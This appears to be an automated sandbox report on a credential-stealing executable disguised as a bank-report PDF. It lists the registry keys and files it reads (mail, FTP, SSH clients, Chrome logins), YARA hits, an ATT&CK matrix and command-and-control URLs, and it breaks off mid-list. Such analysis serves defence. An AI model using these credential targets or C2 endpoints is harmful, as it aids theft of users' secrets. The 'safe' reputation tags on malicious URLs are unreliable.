              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: 5_2_00406069 GetUserNameW,

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: Informe bancario.pdf.exe PID: 6496, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: Informe bancario.pdf.exe PID: 6824, type: MEMORYSTR
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: PopPassword
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeCode function: SmtpPassword
              Source: C:\Users\user\Desktop\Informe bancario.pdf.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.39c40c0.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.12.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.29dc220.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.12.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.8.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.4.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.14.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.39f9f00.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.10.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.8.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.Informe bancario.pdf.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.6.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.29d4fd4.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.14.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.2.Informe bancario.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 5.0.Informe bancario.pdf.exe.400000.10.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.39dfee0.9.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.Informe bancario.pdf.exe.2860464.4.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.293340629.00000000039C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.289020067.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.288685837.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000005.00000000.288344721.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.292486343.0000000002858000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.293368296.00000000039F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
              Valid AccountsWindows Management InstrumentationPath Interception1
              Access Token Manipulation
              1
              Disable or Modify Tools
              2
              OS Credential Dumping
              1
              Account Discovery
              Remote Services11
              Archive Collected Data
              Exfiltration Over Other Network Medium3
              Ingress Tool Transfer
              Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
              Default AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
              Process Injection
              11
              Deobfuscate/Decode Files or Information
              1
              Input Capture
              1
              File and Directory Discovery
              Remote Desktop Protocol2
              Data from Local System
              Exfiltration Over Bluetooth1
              Encrypted Channel
              Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
              Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)13
              Obfuscated Files or Information
              2
              Credentials in Registry
              13
              System Information Discovery
              SMB/Windows Admin Shares1
              Email Collection
              Automated Exfiltration3
              Non-Application Layer Protocol
              Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
              Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)12
              Software Packing
              NTDS111
              Security Software Discovery
              Distributed Component Object Model1
              Input Capture
              Scheduled Transfer113
              Application Layer Protocol
              SIM Card SwapCarrier Billing Fraud
              Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script11
              Masquerading
              LSA Secrets1
              Process Discovery
              SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
              Replication Through Removable MediaLaunchdRc.commonRc.common21
              Virtualization/Sandbox Evasion
              Cached Domain Credentials21
              Virtualization/Sandbox Evasion
              VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
              External Remote ServicesScheduled TaskStartup ItemsStartup Items1
              Access Token Manipulation
              DCSync1
              System Owner/User Discovery
              Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
              Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job11
              Process Injection
              Proc Filesystem1
              Remote System Discovery
              Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              Informe bancario.pdf.exe30%VirustotalBrowse
              Informe bancario.pdf.exe100%Joe Sandbox ML
              No Antivirus matches
              SourceDetectionScannerLabelLinkDownload
              5.0.Informe bancario.pdf.exe.400000.12.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.0.Informe bancario.pdf.exe.400000.8.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.Informe bancario.pdf.exe.39f9f00.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.0.Informe bancario.pdf.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.0.Informe bancario.pdf.exe.400000.14.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              0.2.Informe bancario.pdf.exe.39dfee0.9.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.2.Informe bancario.pdf.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.0.Informe bancario.pdf.exe.400000.10.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              5.0.Informe bancario.pdf.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
              SourceDetectionScannerLabelLink
              kossa.xyz10%VirustotalBrowse
              SourceDetectionScannerLabelLink
              http://kbfvzoboss.bid/alien/fre.php0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%URL Reputationsafe
              http://alphastand.top/alien/fre.php0%URL Reputationsafe
              http://www.ibsensoftware.com/0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htmG0%Avira URL Cloudsafe
              http://www.tiro.com0%URL Reputationsafe
              http://alphastand.win/alien/fre.php0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://alphastand.trade/alien/fre.php0%URL Reputationsafe
              http://www.goodfont.co.krF0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.goodfont.co.krZ0%Avira URL Cloudsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.founder.com.cn/cn/cThe0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://fontfabrik.com0%URL Reputationsafe
              http://www.founder.com.cn/cn0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/s0%URL Reputationsafe
              http://www.tiro.comU0%Avira URL Cloudsafe
              http://www.fontbureau.comm0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://kossa.xyz/esi/pp/play.php0%Avira URL Cloudsafe
              http://www.fontbureau.comce0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.sandoll.co.krE0%Avira URL Cloudsafe
              http://www.zhongyicts.com.cn0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              kossa.xyz
              172.67.154.72
              truetrueunknown
              NameMaliciousAntivirus DetectionReputation
              http://kbfvzoboss.bid/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.top/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.win/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://alphastand.trade/alien/fre.phptrue
              • URL Reputation: safe
              unknown
              http://kossa.xyz/esi/pp/play.phptrue
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://www.apache.org/licenses/LICENSE-2.0Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.259547063.0000000005761000.00000004.00000800.00020000.00000000.sdmpfalse
                high
                http://www.fontbureau.comInforme bancario.pdf.exe, 00000000.00000002.294664129.0000000005750000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://www.fontbureau.com/designersGInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    http://www.fontbureau.com/designers/?Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://www.founder.com.cn/cn/bTheInforme bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                      • URL Reputation: safe
                      unknown
                      http://www.fontbureau.com/designers?Informe bancario.pdf.exe, 00000000.00000002.295243151.0000000006962000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        http://www.ibsensoftware.com/Informe bancario.pdf.exe, Informe bancario.pdf.exe, 00000005.00000000.289365771.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000005.00000002.523674646.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        unknown
                        http://www.galapagosdesign.com/staff/dennis.htmGInforme bancario.pdf.exe, 00000000.00000003.266552640.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.268164390.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267203188.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267404179.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266370808.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.268040307.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.265954001.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266622693.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.265897828.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266080343.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266290134.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266967198.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267554490.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266128541.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267148330.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267028927.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.266471528.000000000578E000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 00000000.00000003.267458378.000000000578D000.00000004.00000800.00020000.00000000.sdmp, Informe bancario.pdf.exe, 